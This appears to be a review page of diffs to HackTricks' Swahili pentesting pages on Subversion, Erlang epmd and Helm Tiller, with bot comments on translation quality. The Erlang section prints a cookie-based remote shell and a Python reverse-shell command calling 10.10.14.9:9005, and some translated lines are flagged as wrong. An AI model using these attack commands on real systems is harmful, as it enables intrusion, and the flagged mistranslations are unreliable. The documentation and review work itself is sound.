* [https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855)
Mchapishaji: **Álex B (@r1p)**
Post created by **Álex B (@r1p)**
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
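Review bot: `# Ukatili` (cruelty) is a mistranslation for the exploitation heading, and the replaced `# Utekaji` (hijacking) was not right either; since `# Basic Information`, `# Shodan` and `# Resources` in this hunk are now English, `# Exploitation` is the consistent choice. In the fenced block, `--script distcc-cve2004-2687` is combined with `--script-args="distcc-exec.cmd='id'"`, where the argument key names the script differently from the `--script` value; confirm the key matches the name the current script actually reads. The `msf5 > use exploit/unix/misc/distcc_exec` prompt line and the nmap command also share one fence with no separator, so they read as a single command sequence; put them in two blocks or add a comment line between them.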

View file

@ -1,121 +1,50 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
# Taarifa Msingi
# Basic Information
**Subversion** ni mfumo wa **udhibiti wa toleo** uliojumuishwa ambao unacheza jukumu muhimu katika kusimamia data ya sasa na ya zamani ya miradi. Kwa kuwa ni zana ya **chanzo wazi**, inafanya kazi chini ya **leseni ya Apache**. Mfumo huu unatambuliwa sana kwa uwezo wake katika **kudhibiti matoleo ya programu na udhibiti wa marekebisho**, ikihakikisha kuwa watumiaji wanaweza kufuatilia mabadiliko kwa ufanisi kwa muda.
**Subversion** ni mfumo wa **udhibiti wa toleo** wa kati ambao una jukumu muhimu katika kusimamia data za sasa na za kihistoria za miradi. Ikiwa ni chombo cha **chanzo wazi**, kinafanya kazi chini ya **leseni ya Apache**. Mfumo huu unatambuliwa sana kwa uwezo wake katika **udhibiti wa toleo la programu na udhibiti wa marekebisho**, kuhakikisha kwamba watumiaji wanaweza kufuatilia mabadiliko kwa ufanisi kwa muda.
**Bandari ya chaguo-msingi:** 3690
**Port ya kawaida:** 3690
```
PORT STATE SERVICE
3690/tcp open svnserve Subversion
```
## Kukamata Bango
Banner Grabbing ni mbinu ya kuchunguza maelezo ya ziada kuhusu seva ya Subversion (SVN) kwa kusoma bango lake. Bango ni ujumbe unaotumwa na seva wakati mteja anapojiunga nayo. Mbinu hii inaweza kutumika kujua toleo la SVN inayotumika na maelezo mengine muhimu kama vile jina la seva na mfumo wa uendeshaji.
Kukamata bango kunaweza kufanywa kwa kutumia zana kama `telnet` au `nc` (netcat). Kwa kawaida, unahitaji kujua anwani ya IP na namba ya bandari ya seva ya SVN ili kufanya kukamata bango.
Kwa mfano, unaweza kutumia amri ifuatayo kwa kutumia `telnet`:
```bash
telnet <anwani ya IP ya seva> <namba ya bandari>
```
Baada ya kuunganisha, bango litatokea kwenye skrini yako. Unaweza kusoma maelezo yaliyomo kwenye bango ili kupata habari muhimu kuhusu seva ya SVN.
Kukamata bango ni hatua ya kwanza katika mchakato wa uchunguzi wa seva ya SVN. Inaweza kusaidia kujua zaidi kuhusu mazingira ya seva na kusaidia katika hatua zingine za uchunguzi na uvamizi.
## Kupata Bango
```
nc -vn 10.10.10.10 3690
```
## Uchambuzi
### Kugundua
Kabla ya kuanza kuchunguza seva ya Subversion (SVN), ni muhimu kufanya uchambuzi wa awali ili kupata habari muhimu. Hapa kuna njia kadhaa za kufanya hivyo:
#### 1. Kutumia Nmap
Tumia Nmap kutambua ikiwa seva ya SVN inafanya kazi na kugundua bandari zinazotumiwa na huduma hiyo. Unaweza kutumia amri ifuatayo:
```bash
nmap -p 3690 <IP>
```
#### 2. Kuchunguza tovuti
Angalia tovuti ya lengo na uangalie ikiwa inatoa viungo vya kupakua programu ya SVN au habari yoyote inayohusiana na SVN.
#### 3. Kuchunguza faili za konfigurisheni
Tafuta faili za konfigurisheni za SVN kwenye seva. Faili muhimu za konfigurisheni ni `svnserve.conf` na `passwd`. Unaweza kuzipata kwa kutumia amri ifuatayo:
```bash
find / -name svnserve.conf 2>/dev/null
find / -name passwd 2>/dev/null
```
#### 4. Kuchunguza metadata ya SVN
Tumia amri ifuatayo kuchunguza metadata ya SVN:
```bash
svn info svn://<IP>
```
#### 5. Kuchunguza historia ya SVN
Tumia amri ifuatayo kuchunguza historia ya SVN:
```bash
svn log svn://<IP>
```
#### 6. Kuchunguza mizizi ya SVN
Tumia amri ifuatayo kuchunguza mizizi ya SVN:
```bash
svn ls svn://<IP>
```
#### 7. Kuchunguza toleo la SVN
Tumia amri ifuatayo kuchunguza toleo la SVN:
```bash
svn --version
```
Baada ya kufanya uchambuzi huu, utakuwa na habari muhimu kuhusu seva ya SVN na utaweza kuendelea na hatua zingine za uchunguzi.
## Uhesabuzi
```bash
svn ls svn://10.10.10.203 #list
svn log svn://10.10.10.203 #Commit history
svn checkout svn://10.10.10.203 #Download the repository
svn up -r 2 #Go to revision 2 inside the checkout folder
```
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
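Review bot: the footer in this hunk is translated (`Jifunze na fanya mazoezi ya AWS Hacking:`, `Angalia [**mpango wa usajili**]`) while the identical footer in the distcc and SAProuter files of this same commit stays English (`Learn & practice AWS Hacking:`, `Check the [**subscription plans**]`); pick one form for the whole commit. In the same hunk `**Port ya kawaida:** 3690` mixes English `Port` into Swahili where the other pages use `**Default port:**`, and `## Kupata Bango` / `## Uhesabuzi` remain Swahili under the now-English `# Basic Information`. Dropping the generated banner-grabbing and `## Uchambuzi` walkthrough (`telnet <anwani ya IP ya seva> ...`, `find / -name passwd 2>/dev/null`, `svn --version`) is right: it described local-filesystem steps on a page about a remote service and duplicated the `svn ls` / `svn log` enumeration block that follows.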

View file

@ -1,32 +1,33 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
# Taarifa Msingi
# Basic Info
**Erlang Port Mapper Daemon (epmd)** hutumika kama mratibu wa mifano iliyosambazwa ya Erlang. Inawajibika kwa kufanya ramani ya majina ya alama ya nodi kuwa anwani za mashine, kwa msingi huu inahakikisha kuwa kila jina la nodi linahusishwa na anwani maalum. Jukumu hili la **epmd** ni muhimu kwa mwingiliano na mawasiliano laini kati ya nodi tofauti za Erlang kwenye mtandao.
**Erlang Port Mapper Daemon (epmd)** inafanya kazi kama mratibu wa mifano ya Erlang iliyosambazwa. Inawajibika kwa kuunganisha majina ya nodi ya alama na anwani za mashine, kwa msingi kuhakikisha kwamba kila jina la nodi linahusishwa na anwani maalum. Jukumu hili la **epmd** ni muhimu kwa mwingiliano na mawasiliano yasiyo na mshono kati ya nodi tofauti za Erlang katika mtandao.
**Bandari ya chaguo-msingi**: 4369
**Default port**: 4369
```
PORT STATE SERVICE VERSION
4369/tcp open epmd Erlang Port Mapper Daemon
```
Hii hutumiwa kwa chaguo-msingi kwenye ufungaji wa RabbitMQ na CouchDB.
Hii inatumika kama chaguo la msingi kwenye usakinishaji wa RabbitMQ na CouchDB.
# Uchunguzi
# Uhesabu
## Kwa Mkono
## Mikono
```bash
echo -n -e "\x00\x01\x6e" | nc -vn <IP> 4369
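Review bot: `# Uhesabu` looks like a truncated form of `Uhesabuzi` (the spelling the Subversion page in this commit uses), and `## Mikono` (hands) is a worse rendering of the Manual heading than the replaced `## Kwa Mkono` (by hand); given `# Basic Info` and `## Remote Connection` on this page are English, `# Enumeration` / `## Manual` would be consistent. The `echo -n -e "\x00\x01\x6e" | nc -vn <IP> 4369` line would also benefit from a comment saying what the bytes are (a two-byte length prefix `\x00\x01` followed by `n`, the epmd names request), since the block currently gives the reader no way to check it.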
@ -37,20 +38,6 @@ erl #Once Erlang is installed this will promp an erlang terminal
1> net_adm:names('<HOST>'). #This will return the listen addresses
```
## Kiotomatiki
Erlang Port Mapper Daemon (EPMD) ni huduma ya msingi katika mazingira ya Erlang ambayo inaruhusu mawasiliano kati ya mchakato wa Erlang kwenye seva tofauti. Kwa kawaida, EPMD inasikiliza kwa TCP kwenye bandari 4369.
Kwa kuzingatia umuhimu wake katika mawasiliano ya mchakato wa Erlang, EPMD inaweza kuwa hatari ikiwa imeachwa wazi au ikiwa ina udhaifu. Kwa hivyo, wakati wa kufanya pentesting, ni muhimu kuchunguza EPMD na kuchunguza ikiwa kuna njia yoyote ya kuvunja usalama.
Kuna njia kadhaa za kufanya hivyo. Moja ya njia ni kutumia nmap kuchunguza bandari 4369 kwenye anwani ya IP ya lengo. Kwa mfano, unaweza kutumia amri ifuatayo:
```
nmap -p 4369 <IP_address>
```
Ikiwa bandari 4369 imefunguliwa, hii inaweza kuashiria kuwa EPMD inafanya kazi na inaweza kupatikana. Kisha, unaweza kutumia zana kama `epmd_client` kuchunguza habari zaidi kuhusu EPMD na mchakato wa Erlang unaofanya kazi kwenye seva.
Kwa kumalizia, kuchunguza EPMD ni hatua muhimu katika pentesting ya mazingira ya Erlang. Kwa kutumia zana sahihi na kufanya uchunguzi wa kina, unaweza kugundua udhaifu wowote na kuchukua hatua za kurekebisha ili kuzuia uwezekano wa uvunjaji wa usalama.
```bash
nmap -sV -Pn -n -T4 -p 4369 --script epmd-info <IP>
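Review bot: dropping the generated `## Kiotomatiki` filler (from `Erlang Port Mapper Daemon (EPMD) ni huduma ya msingi ...` through `Kwa kumalizia, kuchunguza EPMD ...`) is correct; it repeated the Basic Info paragraph, duplicated the `nmap -p 4369` scan that the remaining `--script epmd-info` line already covers, and pointed at an `epmd_client` tool that appears nowhere else on the page. The remaining heading `## Kiotomatiki` is still Swahili next to `# Basic Info` and `## Remote Connection`; `## Automatic` keeps the headings consistent.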
@ -67,9 +54,9 @@ PORT STATE SERVICE VERSION
```
# Erlang Cookie RCE
## Uhusiano wa Mbali
## Remote Connection
Ikiwa unaweza **kuvuja kuki ya uthibitisho**, utaweza kutekeleza nambari kwenye mwenyeji. Kawaida, kuki hii iko katika `~/.erlang.cookie` na hutengenezwa na erlang wakati wa kuanza kwa kwanza. Ikiwa haijasahihishwa au kuwekwa kwa mkono, ni herufi za nasibu \[A:Z] zenye urefu wa herufi 20.
Ikiwa unaweza **kutoa taarifa za Authentication cookie** utaweza kutekeleza msimbo kwenye mwenyeji. Kawaida, cookie hii inapatikana katika `~/.erlang.cookie` na inatengenezwa na erlang wakati wa kuanza kwa mara ya kwanza. Ikiwa haijabadilishwa au kuwekwa kwa mikono ni mfuatano wa nasibu \[A:Z] wenye urefu wa herufi 20.
```bash
greif@baldr ~$ erl -cookie YOURLEAKEDCOOKIE -name test2 -remsh test@target.fqdn
Erlang/OTP 19 [erts-8.1] [source] [64-bit] [async-threads:10]
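Review bot: the paragraph above the `erl -cookie YOURLEAKEDCOOKIE ...` transcript states the consequence of a leaked cookie but nothing about containing it; one sentence noting that `~/.erlang.cookie` must stay readable only by its owner and that the distribution port should not be reachable from untrusted networks would give the page its defensive counterpart. Wording: `mfuatano wa nasibu \[A:Z] wenye urefu wa herufi 20` keeps the odd `\[A:Z]` escape from the source; `[A-Z]` is the usual way to write that character range.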
@ -81,22 +68,22 @@ At last, we can start an erlang shell on the remote system.
(test@target.fqdn)1>os:cmd("id").
"uid=0(root) gid=0(root) groups=0(root)\n"
```
Maelezo zaidi yanapatikana katika [https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/](https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/)\
Mwandishi pia anashiriki programu ya kuvunja nguvu kuki:
Zaidi ya habari katika [https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/](https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/)\
Mwandishi pia anashiriki programu ya kubruteforce cookie:
{% file src="../.gitbook/assets/epmd_bf-0.1.tar.bz2" %}
## Uunganisho wa Ndani
## Muunganisho wa Mitaa
Katika kesi hii, tutatumia CouchDB kuongeza mamlaka kwa kiwango cha ndani:
Katika kesi hii tutatumia CouchDB kuboresha mamlaka kwa ndani:
```bash
HOME=/ erl -sname anonymous -setcookie YOURLEAKEDCOOKIE
(anonymous@canape)1> rpc:call('couchdb@localhost', os, cmd, [whoami]).
"homer\n"
(anonymous@canape)4> rpc:call('couchdb@localhost', os, cmd, ["python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.9\", 9005));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"]).
```
Mfano uliopatikana kutoka [https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution](https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution)\
Unaweza kutumia **Canape HTB machine** kwa **mazoezi** ya jinsi ya **kutumia udhaifu huu**.
Mfano umechukuliwa kutoka [https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution](https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution)\
Unaweza kutumia **Canape HTB machine** **kufanya mazoezi** jinsi ya **kutumia hii vuln**.
## Metasploit
```bash
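Review bot: `## Muunganisho wa Mitaa` renders Local Connection with `mitaa` (neighbourhoods, streets), which is less accurate than the replaced `## Uunganisho wa Ndani` (internal); prefer the earlier wording or the English heading to match `## Remote Connection` above it. `kutumia hii vuln` mixes in an English abbreviation; `kutumia udhaifu huu`, as the replaced line had it, reads better.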
@ -105,19 +92,20 @@ msf5> use exploit/multi/misc/erlang_cookie_rce
```
# Shodan
* `port:4369 "kwenye bandari"`
* `port:4369 "katika bandari"`
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
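Review bot: `port:4369 "katika bandari"` translates the quoted part of a Shodan query, which is matched literally against banner text; the epmd names reply the query targets is English (`name <node> at port <port>`), so both the replaced `"kwenye bandari"` and this new line match nothing. Keep the quoted phrase in the banner's language (`port:4369 "at port"`) and translate only surrounding prose. The footer here is translated (`Jifunze na fanya mazoezi ya AWS Hacking:`) while the same footer in the distcc file of this commit stays `Learn & practice AWS Hacking:`; one form should be used throughout.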

View file

@ -1,30 +1,31 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
# Taarifa Msingi
# Basic Information
Helm ni **meneja wa pakiti** kwa Kubernetes. Inaruhusu kufunga faili za YAML na kuzisambaza kwenye repositori za umma na binafsi. Pakiti hizi huitwa **Helm Charts**. **Tiller** ni **huduma** inayotumika kwa chaguo-msingi kwenye bandari 44134 inayotoa huduma.
Helm ni **meneja wa pakiti** kwa Kubernetes. Inaruhusu kufunga faili za YAML na kuzisambaza katika hifadhi za umma na za kibinafsi. Pakiti hizi zinaitwa **Helm Charts**. **Tiller** ni **huduma** **inayoendesha** kwa chaguo-msingi katika bandari 44134 ikitoa huduma hiyo.
**Bandari ya chaguo-msingi:** 44134
```
PORT STATE SERVICE VERSION
44134/tcp open unknown
```
# Uchambuzi
# Enumeration
Ikiwa unaweza **kuchambua pods na/au huduma** za majina tofauti, chambua na tafuta zile zenye **"tiller" katika jina lao**:
Ikiwa unaweza **kuorodhesha pods na/au huduma** za majimbo tofauti, orodhesha hizo na tafuta zile zenye **"tiller" katika jina lao**:
```bash
kubectl get pods | grep -i "tiller"
kubectl get services | grep -i "tiller"
@ -33,39 +34,7 @@ kubectl get services -n kube-system | grep -i "tiller"
kubectl get pods -n <namespace> | grep -i "tiller"
kubectl get services -n <namespace> | grep -i "tiller"
```
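Review bot: `majimbo tofauti` (different provinces/regions) for namespaces is wrong, and the replaced `majina tofauti` (names) was not right either; the page itself keeps the English term later (`namespace kube-system`), so `namespaces tofauti` keeps the Kubernetes concept recognisable. `**Bandari ya chaguo-msingi:** 44134` is left in Swahili while `# Enumeration` in the same hunk goes English; align with `**Default port:**` as used in the distcc page.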
**Swahili Translation:**
# Pentesting Tiller (Helm)
Helm ni chombo cha usimamizi wa mfuko wa Kubernetes ambacho kinatumika kusimamia na kusambaza programu zilizojengwa kwenye mfumo wa Kubernetes. Tiller ni sehemu ya Helm ambayo inaruhusu watumiaji kusimamia na kudhibiti vifurushi vya programu kwenye mfumo wa Kubernetes.
## Kuchunguza Tiller
Kabla ya kuanza kuchunguza Tiller, ni muhimu kuelewa jinsi inavyofanya kazi na jinsi inavyoshirikiana na mfumo wa Kubernetes. Tiller hutumia gRPC (itifaki ya mawasiliano ya mbali) kwa mawasiliano yake na Kubernetes API server. Kwa hivyo, ni muhimu kuelewa jinsi gRPC inavyofanya kazi na jinsi ya kuchunguza mawasiliano yake.
## Kuvunja Tiller
Kuna njia kadhaa za kuvunja Tiller na kupata udhibiti juu ya mfumo wa Kubernetes. Hapa kuna baadhi ya mbinu zinazoweza kutumika:
1. **Kuvunja Tiller kupitia kuingilia kati kwa trafiki**: Unaweza kuchunguza mawasiliano kati ya Tiller na Kubernetes API server na kuingilia kati kwa trafiki ili kudhibiti mawasiliano hayo. Hii inaweza kufanyika kwa kutumia zana kama mitambo ya kati (man-in-the-middle) au kuvunja SSL/TLS.
2. **Kuvunja Tiller kupitia udhaifu wa usalama**: Unaweza kutafuta udhaifu wa usalama katika Tiller au katika mazingira ya Kubernetes ili kupata udhibiti juu ya mfumo. Hii inaweza kujumuisha kutafuta udhaifu katika toleo la Tiller, kutumia vibaya vibali vya kutosha au kutumia mbinu zingine za kuvunja usalama.
3. **Kuvunja Tiller kupitia mizigo ya Helm**: Unaweza kutumia mizigo ya Helm ili kuvunja Tiller na kupata udhibiti juu ya mfumo wa Kubernetes. Hii inaweza kujumuisha kutumia mizigo ya Helm iliyoundwa kwa makusudi ili kudhibiti Tiller au kutumia mizigo ya Helm iliyoundwa na watumiaji wengine ambayo inaweza kuwa na udhaifu.
## Kuzuia Mashambulizi ya Tiller
Ili kuzuia mashambulizi ya Tiller, kuna hatua kadhaa unazoweza kuchukua:
1. **Funga Tiller**: Ikiwa hauitumii Tiller, unaweza kufunga kabisa ili kuzuia mashambulizi yoyote yanayolenga chombo hicho.
2. **Sasisha Tiller**: Hakikisha kuwa una toleo la karibuni la Tiller na kwamba umesasisha mara kwa mara ili kuepuka udhaifu uliojulikana.
